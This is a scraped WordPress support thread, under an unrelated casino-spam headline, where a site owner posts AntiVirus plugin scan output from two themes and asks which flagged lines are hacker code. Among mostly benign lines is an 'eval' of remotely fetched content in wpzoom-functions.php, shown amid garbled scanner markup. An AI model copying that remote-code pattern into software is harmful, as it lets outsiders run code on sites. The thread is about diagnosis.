Slot casino machine online.Enjoy Free 888+200 Daily Legal Bonus

(@ladyguerra)

I’ve heard from some people that when they visited two of my sites, they got redirected to another website. I just found this plugin and scanned both sites and some came up red. I would like to know, which ones are false alarms? And which ones are hacker codes? And could I delete these codes?

Here were my results
Website 1:

index.php
<?php	include(TEMPLATEPATH . '/featured.php'); ?> <!-- calli ..

functions.php
require_once(ABSPATH . 'wp-admin/upgrade-functions.php') ...

archives.php
<?php include (TEMPLATEPATH . '/pagination.php'); ?>

scripts/timthumb.php
... $cache_file_name = $cache_dir . '/' . get_cache_file();
show_cache_file( $cache_dir, $mime_type );
$mime_type = finfo_file($finfo, $file);
line 234 $mime_type = trim(@shell_exec('file -bi $file'));
line 283 show_cache_file($cache_dir, $mime_type);
line 287 function show_cache_file($cache_dir) {
line 289 $cache_file = $cache_dir . '/' . get_cache_file();
line 321 readfile($cache_file);
line 329 function get_cache_file () {

Then the scan for Website 2 shows:

index.php
line 14 include(TEMPLATEPATH . '/wpzoom-home.php');

header.php
line 120 <?php include (TEMPLATEPATH . '/searchform.php'); ?>

search.php
line 58 <?php include (TEMPLATEPATH . '/searchform.php'); ?>

scripts/timthumb.php
line 25 if( file_exists('timthumb-config.php')) require_once('timthumb-config.php');

line 203 $imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAA ...

line 203... WXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb DULB3RP6JuPuaGfuuV4fumf8Puvq ...

line 203... C2NQ5MQ4ZNao9Ynzjl9ScNYpnebnDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");

line 324 if(! is_file($this->cachefile)){

line 331 } else if(is_file($this->cachefile)){ //If it's not a local reque ...

line 440 if(! is_file($lastCleanFile)){

line 720... 'png' && OPTIPNG_ENABLED && OPTIPNG_PATH && @is_file(OPTIPNG_PATH)){

line 735... ng' && PNGCRUSH_ENABLED && PNGCRUSH_PATH && @is_file(PNGCRUSH_PATH)){

line 741 if(is_file($tempfile2)){

line 761 $fp = fopen($tempfile,'r',0,$context);

line 762 file_put_contents($tempfile4, $this->filePrependSecurityBlo ...

line 763 file_put_contents($tempfile4, $fp, FILE_APPEND);

line 764fclose($fp);

line 768 $fh = fopen($lockFile, 'w');

line 776 fclose($fh);

line 779 fclose($fh);

line 816 if(is_file($file)){

line 869 if(! is_file(WEBSHOT_CUTYCAPT)){

line 872 if(! is_file(WEBSHOT_XVFB)){

line 904 if(! is_file($tempfile)){

line 959 if(! is_file($this->cachefile)){

line 963 $fp = fopen($this->cachefile, 'rb');

line 966 $imgType = fread($fp, 3);

 line 974 $bytesSent = @fpassthru($fp);

line 975 fclose($fp);

line 979 $content = file_get_contents ($this->cachefile);
There is no virusView line 1100self::$curlFH = fopen($tempfile, 'w');

There is no virusView line 1107$curl = curl_init($url);

There is no virusView line 1117$curlResult = curl_exec($curl);

There is no virusView line 1118fclose(self::$curlFH);

There is no virusView line 1132$img = @file_get_contents ($url);

There is no virusView line 1146if(! file_put_contents($tempfile, $img)){

There is no virusView line 1163$bytes = @readfile($file);

There is no virusView line 1167$content = @file_get_contents ($file);

wpzoom_admin/admin_functions.php
There is no virusView line 897include_once(ABSPATH . WPINC . '/rss.php');

widgets/wpzoom-video-widget.php
There is no virusView line 5add_action('widgets_init', create_function('', 'return register_widget("Video_Widget" ...

... ce = preg_replace('/[^( -)]*/','', file_get_contents($url));

functions/wpzoom-video.php
There is no virusView line 225... ce = preg_replace('/[^( -)]*/','', file_get_contents($url));

functions/wpzoom-functions.php
View line 468eval("?>". file_get_contents($url) . " ");

There is no virus". file_get_contents($url) . " ");&theme=CadabraPress&dir=theme" target="_blank">View line 468eval("?>". file_get_contents($url) . " ");

There is no virus". file_get_contents($url) . " ");There is no virus". file_get_contents($url) . " ");&theme=CadabraPress&dir=theme" target="_blank">
line 468eval("?>". file_get_contents($url) . " ");&theme=CadabraPress&dir=theme" target="_blank">
line 533$str = @file_get_contents("https://api.flickr.com/services/rest/?met ...

functions/wpzoom-core.php
line 53require_once($locale_file);

line 58add_filter('gallery_style', create_function('$a', 'return "

 line 123require_once ($functions_path . 'admin_functions.php');

Help please..

https://www.ads-software.com/extend/plugins/antivirus/

Viewing 2 replies - 1 through 2 (of 2 total)

Michelle Reece
(@michelle-reece)

13 years, 2 months ago

I don’t know if this is still relevant, but…

Try https://sitecheck.sucuri.net/scanner/ and https://www.google.com/safebrowsing/diagnostic?site=www.example.com (replace example.com with your website name). They could be false positives (I had the “
require_once(ABSPATH . ‘wp-admin/upgrade-functions.php’) on several occasions even though I was clean), but look on blacklisting/scanner sites to make sure.

Going2MakeIT
(@going2makeit)

12 years, 9 months ago

Man I am confused :-(, Michelle on performed that on-line scanner,it comes back it say my site it is clean, then I get a alert from antivirus plug-in, say that I might have an virus so which one is telling the truth???

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘[Plugin: AntiVirus] Site hacked, here are my codes, what do I do?’ is closed to new replies.